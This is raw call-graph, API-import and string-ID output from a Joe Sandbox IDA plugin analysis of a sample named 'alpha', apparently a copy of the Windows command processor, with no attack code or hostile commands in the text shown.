18977->18985 18978->18922 18980 7ff706ec3448 166 API calls 18979->18980 19006 7ff706ebf10e 18979->19006 19018 7ff706ebf046 18980->19018 18981 7ff706ebf433 18983 7ff706ebf8c0 456 API calls 18981->18983 18982 7ff706ebf438 18987 7ff706ebf860 456 API calls 18982->18987 18982->19018 18983->18982 18984 7ff706ebeff2 iswspace 18984->18985 18986 7ff706ebf01f wcschr 18984->18986 18985->18978 18985->18981 18985->18982 18985->18984 18985->18986 18985->19018 18986->19018 18987->19018 18988 7ff706ebf558 iswspace 18991 7ff706ebf6cd wcschr 18988->18991 18988->19018 18989 7ff706ebf0c4 iswdigit 18990 7ff706ebf5aa 18989->18990 18998 7ff706ebf0ea 18989->18998 18993 7ff706ebf860 456 API calls 18990->18993 18991->19018 18992 7ff706ebf471 18994 7ff706ebf860 456 API calls 18992->18994 19004 7ff706ebf4af 18993->19004 18994->18998 18995 7ff706ebf1b7 iswspace 18995->18989 18997 7ff706ebf1ce wcschr 18995->18997 18996 7ff706ebf1fc iswdigit 18996->19018 18997->18989 18997->18996 18999 7ff706ebf860 456 API calls 18998->18999 18998->19006 19002 7ff706ebf4a6 18999->19002 19000 7ff706ebf8c0 456 API calls 19000->19018 19001 7ff706ebf370 19003 7ff706eb3278 166 API calls 19001->19003 19001->19006 19002->19004 19007 7ff706ebf860 456 API calls 19002->19007 19003->18978 19005 7ff706ebf860 456 API calls 19004->19005 19004->19006 19008 7ff706ebf632 iswspace 19005->19008 19006->18922 19007->19004 19008->19004 19009 7ff706ebf648 wcschr 19008->19009 19009->19004 19011 7ff706ebf65f iswdigit 19009->19011 19010 7ff706ebf32f iswspace 19010->19001 19013 7ff706ebf342 wcschr 19010->19013 19011->19006 19014 7ff706ebf67b 19011->19014 19012 7ff706ebf2b8 iswdigit 19012->19018 19013->19001 19013->19012 19015 7ff706ebf860 456 API calls 19014->19015 19015->19006 19016 7ff706ebf3d2 iswspace 19017 7ff706ebf3e9 wcschr 19016->19017 19016->19018 19017->19018 19018->18988 19018->18989 19018->18990 19018->18992 19018->18995 19018->18996 19018->18998 19018->19000 19018->19001 19018->19010 19018->19012 19018->19016 19019 
7ff706ebf860 456 API calls 19018->19019 19019->19018 19021 7ff706edd381 19020->19021 19022 7ff706edd3d8 19020->19022 19023 7ff706ec34a0 166 API calls 19021->19023 19026 7ff706edd390 19023->19026 19024 7ff706ec3448 166 API calls 19024->19026 19025 7ff706ec34a0 166 API calls 19025->19026 19026->19022 19026->19024 19026->19025 19026->19026 19028 7ff706ec3448 166 API calls 19027->19028 19029 7ff706edd33b 19028->19029 19030 7ff706edd36c 166 API calls 19029->19030 19031 7ff706edd343 19030->19031 19032 7ff706edd3fc 166 API calls 19031->19032 19049 7ff706edd34e 19032->19049 19033 7ff706edd5c2 19033->18959 19034 7ff706edd576 19035 7ff706edd592 19034->19035 19046 7ff706edd555 19034->19046 19036 7ff706ec3448 166 API calls 19035->19036 19039 7ff706edd5a5 19036->19039 19037 7ff706edd5c4 19041 7ff706ec3448 166 API calls 19037->19041 19038 7ff706edd31c 166 API calls 19038->19033 19042 7ff706edd5ba 19039->19042 19045 7ff706ec3448 166 API calls 19039->19045 19040 7ff706edd541 19040->19035 19043 7ff706edd546 19040->19043 19041->19033 19047 7ff706edd36c 166 API calls 19042->19047 19043->19037 19043->19046 19044 7ff706ec3448 166 API calls 19044->19049 19045->19042 19046->19038 19047->19033 19048 7ff706edd3fc 166 API calls 19048->19049 19049->19033 19049->19034 19049->19035 19049->19037 19049->19040 19049->19044 19049->19046 19049->19048 19052 7ff706ed773c 19050->19052 19051 7ff706ed777d 19051->18891 19052->19051 19053 7ff706ec3448 166 API calls 19052->19053 19053->19052 19055 7ff706ed778c 166 API calls 19054->19055 19056 7ff706ed76fb 19055->19056 19057 7ff706ed771c 19056->19057 19058 7ff706ec3448 166 API calls 19056->19058 19057->18891 19059 7ff706ed7711 19058->19059 19060 7ff706ed778c 166 API calls 19059->19060 19060->19057 19062 7ff706ebc486 19061->19062 19063 7ff706ebc4c9 19061->19063 19064 7ff706ebc48e wcschr 19062->19064 19068 7ff706ebc161 19062->19068 19066 7ff706ebff70 2 API calls 19063->19066 19063->19068 19065 7ff706ebc4ef 19064->19065 19064->19068 19067 7ff706ebcd90 166 API 
calls 19065->19067 19066->19068 19074 7ff706ebc4f9 19067->19074 19068->18431 19068->18455 19069 7ff706ebc5bd 19070 7ff706ebc541 19069->19070 19073 7ff706ebb6b0 170 API calls 19069->19073 19070->19068 19072 7ff706ebff70 2 API calls 19070->19072 19071 7ff706ebd840 178 API calls 19071->19074 19072->19068 19073->19070 19074->19068 19074->19069 19074->19070 19074->19071 19076 7ff706ebb018 19075->19076 19076->18492 19077->18492 19079 7ff706ec3bfe 19078->19079 19081 7ff706ec3bcf 19078->19081 19079->18543 19080 7ff706ec3bdc wcschr 19080->19079 19080->19081 19081->19079 19081->19080 19083 7ff706ec8f80 7 API calls 19082->19083 19084 7ff706ec296b 19083->19084 19084->18543 19086 7ff706ec2f2a 19085->19086 19087 7ff706ec2f97 19085->19087 19089 7ff706ec823c 10 API calls 19086->19089 19087->19086 19088 7ff706ec2f9c wcschr 19087->19088 19090 7ff706ec2fb6 wcschr 19088->19090 19097 7ff706ec2f5a 19088->19097 19091 7ff706ec2f56 19089->19091 19090->19086 19090->19097 19092 7ff706ec3a0c 2 API calls 19091->19092 19091->19097 19094 7ff706ec2fe0 19092->19094 19093 7ff706ec8f80 7 API calls 19095 7ff706ec2f83 19093->19095 19096 7ff706ec2fe9 wcsrchr 19094->19096 19094->19097 19095->18543 19096->19097 19097->19093 19098 7ff706ece4ec 19097->19098 19100 7ff706ed4621 19099->19100 19101 7ff706eb72de 19099->19101 19103 7ff706ed47e0 19100->19103 19104 7ff706ed447b longjmp 19100->19104 19107 7ff706ed4639 19100->19107 19116 7ff706ed475e 19100->19116 19102 7ff706eb72eb 19101->19102 19110 7ff706ed4530 19101->19110 19111 7ff706ed4467 19101->19111 19160 7ff706eb7348 19102->19160 19106 7ff706eb7348 168 API calls 19103->19106 19108 7ff706ed4492 19104->19108 19159 7ff706ed4524 19106->19159 19112 7ff706ed4695 19107->19112 19113 7ff706ed463e 19107->19113 19114 7ff706eb7348 168 API calls 19108->19114 19115 7ff706eb7348 168 API calls 19110->19115 19111->19102 19111->19108 19118 7ff706ed4475 19111->19118 19123 7ff706eb73d4 168 API calls 19112->19123 19113->19104 19124 7ff706ed4654 19113->19124 19131 7ff706ed44a8 
19114->19131 19126 7ff706ed4549 19115->19126 19119 7ff706eb7348 168 API calls 19116->19119 19117 7ff706eb7315 19175 7ff706eb73d4 19117->19175 19118->19104 19118->19112 19119->19103 19120 7ff706eb7348 168 API calls 19120->19117 19121 7ff706eb72b0 168 API calls 19127 7ff706ed480e 19121->19127 19140 7ff706ed469a 19123->19140 19132 7ff706eb7348 168 API calls 19124->19132 19125 7ff706ed45b2 19128 7ff706eb7348 168 API calls 19125->19128 19126->19125 19147 7ff706eb7348 168 API calls 19126->19147 19148 7ff706ed455e 19126->19148 19127->18585 19130 7ff706ed45c7 19128->19130 19129 7ff706eb72b0 168 API calls 19137 7ff706ed4738 19129->19137 19134 7ff706eb7348 168 API calls 19130->19134 19135 7ff706eb7348 168 API calls 19131->19135 19143 7ff706ed44e2 19131->19143 19138 7ff706eb7323 19132->19138 19133 7ff706eb7348 168 API calls 19133->19125 19142 7ff706ed45db 19134->19142 19135->19143 19136 7ff706eb72b0 168 API calls 19144 7ff706ed44f1 19136->19144 19141 7ff706eb7348 168 API calls 19137->19141 19138->18585 19139 7ff706ed46e1 19139->19129 19140->19139 19149 7ff706ed46c7 19140->19149 19150 7ff706ed46ea 19140->19150 19141->19159 19145 7ff706eb7348 168 API calls 19142->19145 19143->19136 19146 7ff706eb72b0 168 API calls 19144->19146 19151 7ff706ed45ec 19145->19151 19152 7ff706ed4503 19146->19152 19147->19148 19148->19125 19148->19133 19149->19139 19156 7ff706eb7348 168 API calls 19149->19156 19153 7ff706eb7348 168 API calls 19150->19153 19154 7ff706eb7348 168 API calls 19151->19154 19152->19138 19155 7ff706eb7348 168 API calls 19152->19155 19153->19139 19157 7ff706ed4600 19154->19157 19155->19159 19156->19139 19158 7ff706eb7348 168 API calls 19157->19158 19158->19159 19159->19121 19159->19138 19162 7ff706eb735d 19160->19162 19161 7ff706eb3278 166 API calls 19163 7ff706ed4820 longjmp 19161->19163 19162->19161 19162->19162 19164 7ff706ed4838 19162->19164 19174 7ff706eb73ab 19162->19174 19163->19164 19165 7ff706eb3278 166 API calls 19164->19165 19166 7ff706ed4844 longjmp 19165->19166 
19167 7ff706ed485a 19166->19167 19168 7ff706eb7348 166 API calls 19167->19168 19169 7ff706ed487b 19168->19169 19170 7ff706eb7348 166 API calls 19169->19170 19171 7ff706ed48ad 19170->19171 19172 7ff706eb7348 166 API calls 19171->19172 19173 7ff706eb72ff 19172->19173 19173->19117 19173->19120 19176 7ff706eb7401 19175->19176 19177 7ff706ed485a 19175->19177 19176->19138 19178 7ff706eb7348 168 API calls 19177->19178 19179 7ff706ed487b 19178->19179 19180 7ff706eb7348 168 API calls 19179->19180 19181 7ff706ed48ad 19180->19181 19182 7ff706eb7348 168 API calls 19181->19182 19183 7ff706ed48be 19182->19183 19183->19138 16773 7ff706ec8d80 16774 7ff706ec8da4 16773->16774 16775 7ff706ec8db6 16774->16775 16776 7ff706ec8dbf Sleep 16774->16776 16777 7ff706ec8ddb _amsg_exit 16775->16777 16783 7ff706ec8de7 16775->16783 16776->16774 16777->16783 16778 7ff706ec8e56 _initterm 16780 7ff706ec8e73 _IsNonwritableInCurrentImage 16778->16780 16779 7ff706ec8e3c 16787 7ff706ec37d8 GetCurrentThreadId OpenThread 16780->16787 16783->16778 16783->16779 16783->16780 16820 7ff706ec04f4 16787->16820 16789 7ff706ec3839 HeapSetInformation RegOpenKeyExW 16790 7ff706ece9f8 RegQueryValueExW RegCloseKey 16789->16790 16791 7ff706ec388d 16789->16791 16793 7ff706ecea41 GetThreadLocale 16790->16793 16792 7ff706ec5920 VirtualQuery VirtualQuery 16791->16792 16794 7ff706ec38ab GetConsoleOutputCP GetCPInfo 16792->16794 16807 7ff706ec3919 16793->16807 16794->16793 16795 7ff706ec38f1 memset 16794->16795 16795->16807 16796 7ff706ec4d5c 391 API calls 16796->16807 16797 7ff706ec3948 _setjmp 16797->16807 16798 7ff706eceb27 _setjmp 16798->16807 16799 7ff706ec4c1c 166 API calls 16799->16807 16800 7ff706ed8530 370 API calls 16800->16807 16801 7ff706eb3240 166 API calls 16801->16807 16802 7ff706ec01b8 6 API calls 16802->16807 16803 7ff706ebdf60 481 API calls 16803->16807 16804 7ff706eceb71 _setmode 16804->16807 16805 7ff706ec86f0 182 API calls 16805->16807 16806 7ff706ec0580 12 API calls 16808 7ff706ec398b GetConsoleOutputCP 
GetCPInfo 16806->16808 16807->16790 16807->16796 16807->16797 16807->16798 16807->16799 16807->16800 16807->16801 16807->16802 16807->16803 16807->16804 16807->16805 16807->16806 16809 7ff706ec58e4 EnterCriticalSection LeaveCriticalSection 16807->16809 16811 7ff706ebbe00 647 API calls 16807->16811 16812 7ff706ec58e4 EnterCriticalSection LeaveCriticalSection 16807->16812 16810 7ff706ec04f4 GetModuleHandleW GetProcAddress SetThreadLocale 16808->16810 16809->16807 16810->16807 16811->16807 16813 7ff706ecebbe GetConsoleOutputCP GetCPInfo 16812->16813 16814 7ff706ec04f4 GetModuleHandleW GetProcAddress SetThreadLocale 16813->16814 16815 7ff706ecebe6 16814->16815 16816 7ff706ebbe00 647 API calls 16815->16816 16817 7ff706ec0580 12 API calls 16815->16817 16816->16815 16818 7ff706ecebfc GetConsoleOutputCP GetCPInfo 16817->16818 16819 7ff706ec04f4 GetModuleHandleW GetProcAddress SetThreadLocale 16818->16819 16819->16807 16821 7ff706ec0504 16820->16821 16822 7ff706ec051e GetModuleHandleW 16821->16822 16823 7ff706ec054d GetProcAddress 16821->16823 16824 7ff706ec056c SetThreadLocale 16821->16824 16822->16821 16823->16821
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
Similarity
• API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
• String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$P<dwj`$PATH$PATHEXT$cmd
• API String ID: 3305344409-2075182244
• Opcode ID: a96582028ec0f2fe5c172ab386b274325035dd19617a6b7700d430aa1b709d90
• Instruction ID: 9bfec8900945ec7118506fc4e3bb8b18e404af2f69f167a43fa234661bd7550b
• Opcode Fuzzy Hash: a96582028ec0f2fe5c172ab386b274325035dd19617a6b7700d430aa1b709d90
• Instruction Fuzzy Hash: 14429125A0878285EB64AB219C342BBE7A1FF85BA4FC44234DD1E4B7D5DF3DE5468320

Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$Heap$AllocProcessiswspacememsettowlowerwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: :$:$:$:ON$OFF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 972821348-467788257
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d89b8ef5a57032106b00a460d635cd2fedc4392d70b9e8c128c9239153785143
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9622B225A0874386EB24BF259C352BBE691FF55B94FC89135CA0E4B398DF3CA8458770

                                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: InfoLocale$DefaultUsersetlocale
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: .OCP$Fri$MM/dd/yy$Mon$P<dwj`$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1351325837-2976332092

Control-flow Graph (legend: Executed / Not Executed)
Memory Dump Source
• Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
Similarity
• API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
• String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$P<dwj`$\XCOPY.EXE$h
• API String ID: 388421343-544629229

Control-flow Graph (legend: Executed / Not Executed)
Memory Dump Source
• Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
Similarity
• API ID: QueryValue$CloseOpensrandtime
• String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$P<dwj`$PathCompletionChar$Software\Microsoft\Command Processor
• API String ID: 145004033-1282700733

                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: DisableCMD$P<dwj`$Software\Policies\Microsoft\Windows\System
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2624720099-3347456029

                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ErrorFileFindFirstLast
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 873889042-0

                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: P<dwj`
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 0-4006019111
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d41d0de1647fb3a2a3695abdeb6e65bb161f4093d64720d8f5557838e3a5be7f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D751E562B1878289EA30AF15AD642BBE690FF54BB4FC44230DE6E077D1DF3CE5468610

[Figure: Control-flow Graph; legend: Executed / Not Executed]
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC4D9A
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC58E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF706EDC6DB), ref: 00007FF706EC58EF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC4DBB
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF706EC4DCA
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC4DE0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF706EC4DEE
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC4E04
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0580: _get_osfhandle.MSVCRT ref: 00007FF706EC0589
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0580: SetConsoleMode.KERNELBASE ref: 00007FF706EC059E
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0580: _get_osfhandle.MSVCRT ref: 00007FF706EC05AF
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0580: GetConsoleMode.KERNELBASE ref: 00007FF706EC05C5
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0580: _get_osfhandle.MSVCRT ref: 00007FF706EC05EF
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0580: GetConsoleMode.KERNELBASE ref: 00007FF706EC0605
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0580: _get_osfhandle.MSVCRT ref: 00007FF706EC0632
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0580: SetConsoleMode.KERNELBASE ref: 00007FF706EC0647
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4A28
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4A66
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4A7D
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4A14: memmove.MSVCRT(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4A9A
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4AA2
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EB8798), ref: 00007FF706EC4AD6
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EB8798), ref: 00007FF706EC4AEF
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC5554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF706EC4E35), ref: 00007FF706EC55DA
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC5554: RegQueryValueExW.KERNELBASE ref: 00007FF706EC5623
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC5554: RegQueryValueExW.KERNELBASE ref: 00007FF706EC5667
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC5554: RegQueryValueExW.KERNELBASE ref: 00007FF706EC56BE
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC5554: RegQueryValueExW.KERNELBASE ref: 00007FF706EC5702
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC4E35
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC4E81
